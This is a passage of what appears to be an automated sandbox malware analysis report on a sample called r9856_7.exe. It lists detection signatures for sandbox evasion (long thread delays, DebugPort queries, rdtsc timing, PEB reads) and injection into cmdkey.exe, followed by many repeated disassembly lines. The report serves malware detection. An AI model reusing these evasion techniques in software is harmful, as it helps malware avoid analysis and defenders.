            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: r9856_7.exe PID: 6648, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Users\user\Desktop\r9856_7.exe Memory allocated: 2E70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\r9856_7.exe Code function: 4_2_0112096E rdtsc 4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5977
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2587
            Source: C:\Windows\SysWOW64\cmdkey.exe Window / User API: threadDelayed 9785
            Source: C:\Users\user\Desktop\r9856_7.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdkey.exe API coverage: 2.7 %
            Source: C:\Users\user\Desktop\r9856_7.exe TID: 6396 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544 Thread sleep count: 189 > 30
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544 Thread sleep time: -378000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544 Thread sleep count: 9785 > 30
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544 Thread sleep time: -19570000s >= -30000s
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564 Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564 Thread sleep time: -61500s >= -30000s
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564 Thread sleep count: 45 > 30
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564 Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdkey.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 8_2_00A1BF60 FindFirstFileW,FindNextFileW,FindClose, 8_2_00A1BF60
            Source: 267_8V0-3.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3816401592.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1846834492.00000265261BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\r9856_7.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\r9856_7.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cmdkey.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\r9856_7.exe Code function: 4_2_004173F3 LdrLoadDll, 4_2_004173F3
            Source: C:\Users\user\Desktop\r9856_7.exe Code function: 4_2_0118A118 mov ecx, dword ptr fs:[00000030h] 4_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110438F mov eax, dword ptr fs:[00000030h]4_2_0110438F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110438F mov eax, dword ptr fs:[00000030h]4_2_0110438F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov ecx, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011843D4 mov eax, dword ptr fs:[00000030h]4_2_011843D4
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011843D4 mov eax, dword ptr fs:[00000030h]4_2_011843D4
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119C3CD mov eax, dword ptr fs:[00000030h]4_2_0119C3CD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011663C0 mov eax, dword ptr fs:[00000030h]4_2_011663C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011163FF mov eax, dword ptr fs:[00000030h]4_2_011163FF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D823B mov eax, dword ptr fs:[00000030h]4_2_010D823B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B625D mov eax, dword ptr fs:[00000030h]4_2_011B625D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A250 mov eax, dword ptr fs:[00000030h]4_2_0119A250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A250 mov eax, dword ptr fs:[00000030h]4_2_0119A250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01168243 mov eax, dword ptr fs:[00000030h]4_2_01168243
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01168243 mov ecx, dword ptr fs:[00000030h]4_2_01168243
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6259 mov eax, dword ptr fs:[00000030h]4_2_010E6259
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA250 mov eax, dword ptr fs:[00000030h]4_2_010DA250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D826B mov eax, dword ptr fs:[00000030h]4_2_010D826B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E284 mov eax, dword ptr fs:[00000030h]4_2_0111E284
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E284 mov eax, dword ptr fs:[00000030h]4_2_0111E284
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02A0 mov eax, dword ptr fs:[00000030h]4_2_010F02A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02A0 mov eax, dword ptr fs:[00000030h]4_2_010F02A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov ecx, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B62D6 mov eax, dword ptr fs:[00000030h]4_2_011B62D6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176500 mov eax, dword ptr fs:[00000030h]4_2_01176500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8550 mov eax, dword ptr fs:[00000030h]4_2_010E8550
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8550 mov eax, dword ptr fs:[00000030h]4_2_010E8550
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2582 mov eax, dword ptr fs:[00000030h]4_2_010E2582
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2582 mov ecx, dword ptr fs:[00000030h]4_2_010E2582
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E59C mov eax, dword ptr fs:[00000030h]4_2_0111E59C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01114588 mov eax, dword ptr fs:[00000030h]4_2_01114588
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011045B1 mov eax, dword ptr fs:[00000030h]4_2_011045B1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011045B1 mov eax, dword ptr fs:[00000030h]4_2_011045B1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A5D0 mov eax, dword ptr fs:[00000030h]4_2_0111A5D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A5D0 mov eax, dword ptr fs:[00000030h]4_2_0111A5D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E5CF mov eax, dword ptr fs:[00000030h]4_2_0111E5CF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E5CF mov eax, dword ptr fs:[00000030h]4_2_0111E5CF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E65D0 mov eax, dword ptr fs:[00000030h]4_2_010E65D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E25E0 mov eax, dword ptr fs:[00000030h]4_2_010E25E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C5ED mov eax, dword ptr fs:[00000030h]4_2_0111C5ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C5ED mov eax, dword ptr fs:[00000030h]4_2_0111C5ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A430 mov eax, dword ptr fs:[00000030h]4_2_0111A430
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC427 mov eax, dword ptr fs:[00000030h]4_2_010DC427
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110245A mov eax, dword ptr fs:[00000030h]4_2_0110245A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A456 mov eax, dword ptr fs:[00000030h]4_2_0119A456
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D645D mov eax, dword ptr fs:[00000030h]4_2_010D645D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C460 mov ecx, dword ptr fs:[00000030h]4_2_0116C460
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A49A mov eax, dword ptr fs:[00000030h]4_2_0119A49A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011144B0 mov ecx, dword ptr fs:[00000030h]4_2_011144B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E64AB mov eax, dword ptr fs:[00000030h]4_2_010E64AB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116A4B0 mov eax, dword ptr fs:[00000030h]4_2_0116A4B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E04E5 mov ecx, dword ptr fs:[00000030h]4_2_010E04E5
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01110710 mov eax, dword ptr fs:[00000030h]4_2_01110710
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C700 mov eax, dword ptr fs:[00000030h]4_2_0111C700
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0710 mov eax, dword ptr fs:[00000030h]4_2_010E0710
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115C730 mov eax, dword ptr fs:[00000030h]4_2_0115C730
